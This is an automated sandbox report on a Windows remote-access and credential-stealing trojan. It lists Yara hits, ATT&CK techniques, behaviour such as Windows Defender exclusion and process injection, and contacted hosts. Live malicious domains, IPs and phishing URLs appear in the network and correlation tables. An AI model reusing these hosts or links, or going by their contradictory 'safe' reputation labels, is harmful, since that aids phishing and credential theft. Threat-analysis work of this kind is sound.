Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3267531741.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; a technique the sandbox matched carries its number of matching signatures in parentheses)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (111); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (31); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Query Registry (1); Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Email Collection (1); Archive Collected Data (11); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (23); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (rendered graph not recoverable; the node text that survived follows)

Behavior Graph ID: 1482926; Sample: SecuriteInfo.com.Win32.RATX...; Start date: 26/07/2024; Architecture: WINDOWS; Score: 100
Start node: DNS/IP reallyfreegeoip.org, mail.erkanlarofis.com.tr, 3 other IPs or domains; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 8 other signatures
Signature attached to reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
Process SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe (4), started: dropped file SecuriteInfo.com.W...20281.29649.exe.log, ASCII; signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes; child processes: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe (15 2), started; powershell.exe (23), started
Child process SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe: DNS/IP erkanlarofis.com.tr 77.245.159.7, 49730, 49731, 49732, NIOBEBILISIMHIZMETLERITR, Turkey; reallyfreegeoip.org 188.114.97.3, 443, 49710, 49711, CLOUDFLARENETUS, European Union; checkip.dyndns.com 158.101.44.242, 49706, 49712, 49714, ORACLE-BMC-31898US, United States; signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
Child process powershell.exe: signature: Loading BitLocker PowerShell Module; child processes: WmiPrvSE.exe, started; conhost.exe, started
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | 29% | Virustotal |
SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | 100% | Avira | HEUR/AGEN.1357443
SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
erkanlarofis.com.tr | 0% | Virustotal |
reallyfreegeoip.org | 0% | Virustotal |
checkip.dyndns.com | 0% | Virustotal |
mail.erkanlarofis.com.tr | 0% | Virustotal |
checkip.dyndns.org | 0% | Virustotal |

Source | Detection | Scanner | Label
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
http://reallyfreegeoip.org | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
http://checkip.dyndns.com | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33p | 0% | Avira URL Cloud | safe
http://checkip.dyndns.orgp | 0% | Avira URL Cloud | safe
http://erkanlarofis.com.tr | 0% | Avira URL Cloud | safe
http://mail.erkanlarofis.com.tr | 0% | Avira URL Cloud | safe
http://mail.erkanlarofis.com.tr | 0% | Virustotal |
http://erkanlarofis.com.tr | 0% | Virustotal |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
erkanlarofis.com.tr | 77.245.159.7 | true | true | | unknown
reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
checkip.dyndns.com | 158.101.44.242 | true | false | | unknown
mail.erkanlarofis.com.tr | unknown | unknown | true | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.orgp | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33p | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://erkanlarofis.com.tr | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CA2000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://reallyfreegeoip.org | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.erkanlarofis.com.tr | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CA2000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.com | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2030808556.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe
            unknown
            IP              | Domain               | Country         | ASN   | ASN Name                  | Malicious
            188.114.97.3    | reallyfreegeoip.org  | European Union  | 13335 | CLOUDFLARENETUS           | true
            158.101.44.242  | checkip.dyndns.com   | United States   | 31898 | ORACLE-BMC-31898US        | false
            77.245.159.7    | erkanlarofis.com.tr  | Turkey          | 42868 | NIOBEBILISIMHIZMETLERITR  | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1482926
            Start date and time:2024-07-26 11:38:11 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 58s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@7/6@3/3
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 105
            • Number of non-executed functions: 13
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            Time      | Type             | Description
            05:38:57  | API Interceptor  | 3856366x Sleep call for process: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe modified
            05:38:59  | API Interceptor  | 10x Sleep call for process: powershell.exe modified
            Match           | Associated Sample Name / URL                                  | Detection | Threat Name                                     | Context
            188.114.97.3    | RFQ#51281AOLAI.xls                                            | malicious | FormBook, PureLog Stealer                       | tny.wtf/
            188.114.97.3    | #U00d6DEME TAVS#U0130YES#U0130.xls                            | malicious | Remcos                                          | tny.wtf/4Gs
            188.114.97.3    | Notepad3_v6.23.203.2.exe                                      | malicious | Amadey, GO Backdoor                             | downloaddining2.com/h9fmdW6/index.php
            188.114.97.3    | Quotation.exe                                                 | malicious | FormBook                                        | www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
            188.114.97.3    | LisectAVT_2403002B_412.exe                                    | malicious | FormBook                                        | www.whatareyoucraving.com/drbb/
            188.114.97.3    | AVISO DE PAGO.xls                                             | malicious | Unknown                                         | tny.wtf/pqv2p
            188.114.97.3    | AVISO DE PAGO.xls                                             | malicious | Unknown                                         | tny.wtf/pqv2p
            188.114.97.3    | AVISO DE PAGO.xls                                             | malicious | Unknown                                         | tny.wtf/pqv2p
            188.114.97.3    | PO S0042328241130.xls                                         | malicious | Remcos                                          | tny.wtf/vMCQY
            188.114.97.3    | LisectAVT_2403002B_89.exe                                     | malicious | CobaltStrike                                    | cccc.yiuyiu.xyz/config.ini
            158.101.44.242  | New order.exe                                                 | malicious | Snake Keylogger                                 | checkip.dyndns.org/
            158.101.44.242  | Torpernes.exe                                                 | malicious | GuLoader, Snake Keylogger                       | checkip.dyndns.org/
            158.101.44.242  | DSD876543456780000.exe                                        | malicious | Snake Keylogger, VIP Keylogger                  | checkip.dyndns.org/
            158.101.44.242  | Confirmation transfer Note AGS # 22-00379.exe                 | malicious | GuLoader, Snake Keylogger                       | checkip.dyndns.org/
            158.101.44.242  | rPO0977-6745.exe                                              | malicious | Snake Keylogger                                 | checkip.dyndns.org/
            158.101.44.242  | z1QuotationSheetVSAA6656776.exe                               | malicious | GuLoader, Snake Keylogger                       | checkip.dyndns.org/
            158.101.44.242  | rcrypt.exe                                                    | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
            158.101.44.242  | rRFQ_025261-97382.exe                                         | malicious | Snake Keylogger                                 | checkip.dyndns.org/
            158.101.44.242  | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf      | malicious | Snake Keylogger, VIP Keylogger                  | checkip.dyndns.org/
            158.101.44.242  | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf   | malicious | Snake Keylogger                                 | checkip.dyndns.org/
            Match                | Associated Sample Name / URL  | Detection | Threat Name                                     | Context
            reallyfreegeoip.org  | new order 00041221.exe        | malicious | Snake Keylogger, VIP Keylogger                  | 188.114.97.3
            reallyfreegeoip.org  | New order.exe                 | malicious | Snake Keylogger                                 | 188.114.97.3
            reallyfreegeoip.org  | New Order.exe                 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
            reallyfreegeoip.org  | Payment_Advice.exe            | malicious | GuLoader, Snake Keylogger                       | 188.114.97.3
            reallyfreegeoip.org  | LPO-9180155-PDF.exe           | malicious | GuLoader, Snake Keylogger                       | 188.114.97.3
            reallyfreegeoip.org  | Apixaban - August 2024.exe    | malicious | GuLoader, Snake Keylogger                       | 188.114.96.3
            reallyfreegeoip.org  | Payment Slip.exe              | malicious | GuLoader, Snake Keylogger                       | 188.114.97.3
            reallyfreegeoip.org  | Torpernes.exe                 | malicious | GuLoader, Snake Keylogger                       | 188.114.96.3
            reallyfreegeoip.org  | Confirmation Order.js         | malicious | Snake Keylogger                                 | 188.114.97.3
            reallyfreegeoip.org  | DSD876543456780000.exe        | malicious | Snake Keylogger, VIP Keylogger                  | 188.114.97.3
            checkip.dyndns.com   | new order 00041221.exe        | malicious | Snake Keylogger, VIP Keylogger                  | 193.122.6.168
            checkip.dyndns.com   | New order.exe                 | malicious | Snake Keylogger                                 | 193.122.6.168
            checkip.dyndns.com   | New Order.exe                 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
            checkip.dyndns.com   | Payment_Advice.exe            | malicious | GuLoader, Snake Keylogger                       | 193.122.6.168
            checkip.dyndns.com   | LPO-9180155-PDF.exe           | malicious | GuLoader, Snake Keylogger                       | 132.226.247.73
            checkip.dyndns.com   | Apixaban - August 2024.exe    | malicious | GuLoader, Snake Keylogger                       | 193.122.6.168
            checkip.dyndns.com   | Payment Slip.exe              | malicious | GuLoader, Snake Keylogger                       | 193.122.6.168
            checkip.dyndns.com   | Torpernes.exe                 | malicious | GuLoader, Snake Keylogger                       | 158.101.44.242
            checkip.dyndns.com   | Confirmation Order.js         | malicious | Snake Keylogger                                 | 132.226.247.73
            checkip.dyndns.com   | DSD876543456780000.exe        | malicious | Snake Keylogger, VIP Keylogger                  | 158.101.44.242
            Match                     | Associated Sample Name / URL                                        | Detection | Threat Name                                     | Context
            CLOUDFLARENETUS           | file.exe                                                            | malicious | Unknown                                         | 104.21.72.79
            CLOUDFLARENETUS           | file.exe                                                            | malicious | Unknown                                         | 104.21.72.79
            CLOUDFLARENETUS           | RFQ#51281AOLAI.xls                                                  | malicious | FormBook, PureLog Stealer                       | 188.114.96.3
            CLOUDFLARENETUS           | http://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeam   | malicious | HTMLPhisher                                     | 188.114.96.3
            CLOUDFLARENETUS           | https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1j | malicious | HTMLPhisher | 188.114.96.3
            CLOUDFLARENETUS           | file.exe                                                            | malicious | Amadey, Babadeda, Stealc, Vidar                 | 172.64.41.3
            CLOUDFLARENETUS           | file.exe                                                            | malicious | Babadeda                                        | 172.64.41.3
            CLOUDFLARENETUS           | https://forms.office.com/r/xULzprLcwH                               | malicious | Unknown                                         | 104.18.94.41
            CLOUDFLARENETUS           | file.exe                                                            | malicious | Babadeda                                        | 172.64.41.3
            CLOUDFLARENETUS           | SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exe                 | malicious | AgentTesla                                      | 172.67.74.152
            ORACLE-BMC-31898US        | new order 00041221.exe                                              | malicious | Snake Keylogger, VIP Keylogger                  | 193.122.6.168
            ORACLE-BMC-31898US        | New order.exe                                                       | malicious | Snake Keylogger                                 | 158.101.44.242
            ORACLE-BMC-31898US        | http://docusign.net                                                 | malicious | Unknown                                         | 192.29.14.118
            ORACLE-BMC-31898US        | New Order.exe                                                       | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
            ORACLE-BMC-31898US        | Payment_Advice.exe                                                  | malicious | GuLoader, Snake Keylogger                       | 193.122.6.168
            ORACLE-BMC-31898US        | Apixaban - August 2024.exe                                          | malicious | GuLoader, Snake Keylogger                       | 193.122.6.168
            ORACLE-BMC-31898US        | Payment Slip.exe                                                    | malicious | GuLoader, Snake Keylogger                       | 193.122.6.168
            ORACLE-BMC-31898US        | Torpernes.exe                                                       | malicious | GuLoader, Snake Keylogger                       | 158.101.44.242
            ORACLE-BMC-31898US        | Lisect_AVT_24003_G1B_67.exe                                         | malicious | Unknown                                         | 158.101.28.51
            ORACLE-BMC-31898US        | DSD876543456780000.exe                                              | malicious | Snake Keylogger, VIP Keylogger                  | 158.101.44.242
            NIOBEBILISIMHIZMETLERITR  | file.exe                                                            | malicious | SystemBC                                        | 77.245.149.25
            NIOBEBILISIMHIZMETLERITR  | #U0130#U015eLEM #U00d6ZET#U0130_G5024057699-1034 nolu TICARI.exe    | malicious | AgentTesla                                      | 77.245.148.100
            NIOBEBILISIMHIZMETLERITR  | SKM_C3350i2402291223.bat.exe                                        | malicious | AgentTesla                                      | 77.245.148.65
            NIOBEBILISIMHIZMETLERITR  | Overdue Account Notice.exe                                          | malicious | AgentTesla                                      | 77.245.159.10
            NIOBEBILISIMHIZMETLERITR  | Product list.png.exe                                                | malicious | AgentTesla                                      | 77.245.159.10
            NIOBEBILISIMHIZMETLERITR  | NEW PURCHASE ORDER.png.exe                                          | malicious | AgentTesla, PureLog Stealer                     | 77.245.159.10
            NIOBEBILISIMHIZMETLERITR  | 1AIemYSAZy.exe                                                      | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc   | 77.245.149.43
            NIOBEBILISIMHIZMETLERITR  | SecuriteInfo.com.Win32.TrojanX-gen.10323.31552.exe                  | malicious | AgentTesla                                      | 77.245.159.10
